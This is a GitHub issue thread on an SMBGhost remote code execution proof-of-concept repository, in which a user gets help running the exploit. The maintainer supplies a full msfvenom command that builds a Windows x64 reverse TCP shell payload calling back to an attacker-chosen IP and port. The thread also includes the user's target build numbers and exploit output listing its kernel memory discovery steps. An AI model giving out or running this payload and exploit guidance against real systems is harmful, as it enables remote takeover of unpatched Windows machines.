chompie1337/SMBGhost_RCE_PoC

which port should I listen on my computer?

IMnewer opened this issue · 5 comments

which port should I listen on my computer?
default is 4444?

The exploit has no knowledge of your IP, you must replace the USER_PAYLOAD portion in exploit.py with your own payload.

If you want a reverse shell, you can use msfvenom to generate one. Ex:
msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=192.168.213.1 LPORT=31337 -f python

msfvenom come standards on Kali Linux which you can download from here:
https://www.kali.org/downloads/

Ready made VMs can be downloaded from here:
https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/

OK, Thranks!

i tried, but only got bule screen ...

my target windows is version win10 1903 (os build 18362.719)

i tried, but only got bule screen ...

my target windows is version win10 1903 (os build 18362.719)

try it again, 2-3x, and if you can please report the stop code. thank you

@chompie1337 i turned to another win10 1903 (os build 19362.356) and tried again, this time it didn't show bule screen. but the poc shows the following information:

# python3 exploit.py -ip 192.168.134.38
[+] found low stub at phys addr 12000!
[+] PML4 at 1aa000
[+] base of HAL heap at fffff785c0000000
[+] found PML4 self-ref entry 14b
[-] failed to find HalpInterruptController!